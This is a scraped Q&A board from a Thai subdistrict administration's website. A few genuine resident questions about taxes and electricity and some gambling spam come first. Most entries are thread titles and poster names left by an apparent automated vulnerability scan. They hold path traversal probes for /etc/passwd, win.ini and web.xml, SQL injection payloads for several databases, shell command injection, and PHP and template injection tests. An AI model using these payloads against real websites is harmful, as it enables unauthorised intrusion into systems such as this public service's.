:
องค์การบริหารส่วนตำบลนาจิก ยินดีให้บริการ โทรศัพท์/โทรสาร 045989741

Q&A

หัวข้อ ผู้ตั้งกระทู้ ตอบ
สอบถามการเสียภาษี โบว์ 1
ไฟฟ้าส่องสว่าง สมพร 1
บริการ ส่งพัสดุไปต่างประเทศ Karton Express 0
บริการ ส่งเอกสารไปต่างประเทศ Karton Express 0
ขยายแนวเขตไฟฟ้า นายบุญเทียน 1
ของดี สมชาย 0
texas168th texas168th 0
texas168th texas168th 0
สล็อตเว็บตรงไม่ผ่านเอเย่นต์ admin 0
ซื้อหวยออนไลน์ เว็บไหนดี ซื้อหวยเว็บไหนดี 0
123456 123456 0
123456 lncazatacpucznjczrgh 0
123456 123456 0
../../../../../../../../../../../../../../../../../../etc/passwd 123456 0
lncazatacpucznjczrgh 123456 0
../../../../../../../../../../../../../../../../../../etc/passwd123456 123456 0
123456 123456 0
./../../../../../../../../../../../../../../../../../../etc/passwd 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u0 123456 0
123456 123456 0
../../../../../../etc/passwd 123456 0
123456 123456 0
../../../../../../etc/passwd123456 123456 0
./../../../../../../etc/passwd 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 123456 0
/etc/passwd 123456 0
/etc/passwd123456 123456 0
%2fetc%2fpasswd 123456 0
%u2215etc%u2215passwd 123456 0
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 123456 0
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 123456 0
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini123456 123456 0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 123456 0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u0 123456 0
..\..\..\..\..\..\Windows\win.ini 123456 0
.\..\..\..\..\..\..\Windows\win.ini 123456 0
..\..\..\..\..\..\Windows\win.ini123456 123456 0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 123456 0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 123456 0
../../../../../../../../../../../../../../../../../../Windows/win.ini 123456 0
./../../../../../../../../../../../../../../../../../../Windows/win.ini 123456 0
../../../../../../../../../../../../../../../../../../Windows/win.ini123456 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u0 123456 0
../../../../../../Windows/win.ini 123456 0
./../../../../../../Windows/win.ini 123456 0
../../../../../../Windows/win.ini123456 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 123456 0
WEB-INF/web.xml 123456 0
WEB-INF/web.xml;123456 123456 0
../WEB-INF/web.xml 123456 0
123456 123456 0
../WEB-INF/web.xml;123456 123456 0
123456 123456 0
123456 123456 0
../../WEB-INF/web.xml 123456 0
123456 123456'and/**/extractvalue(1,concat(char(126),md5(1476347853)))and' 0
../../WEB-INF/web.xml;123456 123456 0
123456 123456"and/**/extractvalue(1,concat(char(126),md5(1111659130)))and" 0
../../../WEB-INF/web.xml 123456 0
123456 extractvalue(1,concat(char(126),md5(1771207376))) 0
../../../WEB-INF/web.xml;123456 123456 0
123456 123456'and(select'1'from/**/cast(md5(1838689539)as/**/int))>'0 0
../../../../WEB-INF/web.xml 123456 0
../../../../WEB-INF/web.xml;123456 123456 0
123456 123456/**/and/**/cast(md5('1338926479')as/**/int)>0 0
123456 convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1659113117'))) 0
123456 123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1683466405')))>'0 0
123456 expr 899114660 + 864927087 123456 0
123456 123456鎈'"\( 0
123456|expr 827921293 + 916227304 123456 0
123456 123456'"\( 0
123456 123456 0
123456$(expr 992147840 + 835027680) 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456&set /A 849079458+984252544 123456 0
123456 123456 0
123456 123456 0
123456/**/and+2=2 123456 0
expr 925622193 + 940957151 123456 0
123456 123456 0
123456 123456 0
123456/**/and+3=9 123456 0
123456 123456 0
123456'and'c'='c 123456 0
123456 123456 0
123456'and'q'='y 123456 0
123456 123456 0
123456"and"w"="w 123456 0
123456 123456 0
123456"and"h"="l 123456 0
123456 123456 expr 829371329 + 851407462 0
123456'and/**/extractvalue(1,concat(char(126),md5(1524464640)))and' 123456 0
123456 123456|expr 925984760 + 836469814 0
123456 123456 0
123456"and/**/extractvalue(1,concat(char(126),md5(1080142794)))and" 123456 0
123456 123456$(expr 954766976 + 990257545) 0
123456 123456 0
extractvalue(1,concat(char(126),md5(1801476100))) 123456 0
123456 123456 0
123456 123456&set /A 819801522+957764288 0
(select*from(select+sleep(0)union/**/select+1)a) 123456 0
123456'and(select'1'from/**/cast(md5(1510763553)as/**/int))>'0 123456 0
123456 expr 967626794 + 925026043 0
123456/**/and/**/cast(md5('1167983292')as/**/int)>0 123456 0
123456 123456 0
(select*from(select+sleep(2)union/**/select+1)a) 123456 0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1077402978'))) 123456 0
123456 123456 0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 0
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1596856445')))>'0 123456 0
123456 123456 0
123456鎈'"\( 123456 0
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 123456 0
123456 123456 0
123456'"\( 123456 0
123456 123456 0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 0
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 123456 0
123456 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 0
123456 123456 0
123456 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 123456 0
123456 123456 0
${@var_dump(md5(307569608))}; 123456 0
'-var_dump(md5(921389753))-' 123456 0
123456 123456 0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 123456 0
123456 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 0
123456 123456 0
123456 ${@var_dump(md5(594234762))}; 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 123456 0
123456 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 0
123456 '-var_dump(md5(649609503))-' 0
123456 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:2 123456 0
123456 123456 0
123456 123456 0
123456 '+(44310*40827)+' 0
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('x',0) 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('e',2) 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',0)='x 123456 0
123456 123456 0
'+(43216*40210)+' 123456 0
123456 123456 0
123456 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',2)='b 123456 0
123456 123456 0
${883428756+951601148} 123456 0
/*1*/{{958849714+992659653}} 123456 0
${952822365+975595338} 123456 0
123456 ${838752803+821295241} 0
${(947650987+881095277)?c} 123456 0
#set($c=801645651+898868384)${c}$c 123456 0
<%- 960166494+951490228 %> 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 /*1*/{{907015916+976786262}} 0
123456 123456/**/and+2=2 0
123456 123456 0
123456 ${893655974+819080698} 0
123456 123456 0
123456 123456/**/and+0=7 0
123456 ${(999905183+948415123)?c} 0
123456 123456 0
123456 123456'and'w'='w 0
123456 #set($c=912954765+953706960)${c}$c 0
123456 123456 0
123456 <%- 916687944+843715496 %> 0
123456 123456'and'b'='c 0
123456 123456 0
123456 123456"and"g"="g 0
123456 123456"and"z"="d 0
123456 (select*from(select+sleep(0)union/**/select+1)a) 0
123456 (select*from(select+sleep(2)union/**/select+1)a) 0
123456 123456 0
123456 123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 0
123456 123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 0
123456 123456 0
123456 123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 0
123456 123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 0
123456 123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 0
123456 123456 0
123456 123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:0 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:2 0
123456 123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('x',0) 0
123456 123456 0
123456 123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('m',2) 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',0)='k 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',2)='o 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0